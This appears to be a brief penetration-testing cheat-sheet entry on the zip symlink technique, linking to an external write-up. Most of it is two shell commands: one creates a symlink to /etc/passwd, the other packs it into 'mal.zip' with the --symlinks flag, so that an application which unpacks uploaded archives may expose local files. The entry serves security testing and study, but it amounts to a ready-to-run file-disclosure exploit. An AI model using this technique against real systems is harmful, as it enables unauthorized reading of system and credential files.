# Zip Symlink

https://effortlesssecurity.in/zip-symlink-vulnerability/

The exploit achieves local file inclusion (LFI) through a symlink that is compressed inside a zip file and uploaded.

Create a symlink and put it in a zip file. First, create the symlink:

```sh
ln -s /etc/passwd link.name
```

Then compress it, leaving the symlink intact:

```sh
zip -r --symlinks mal.zip link.name
```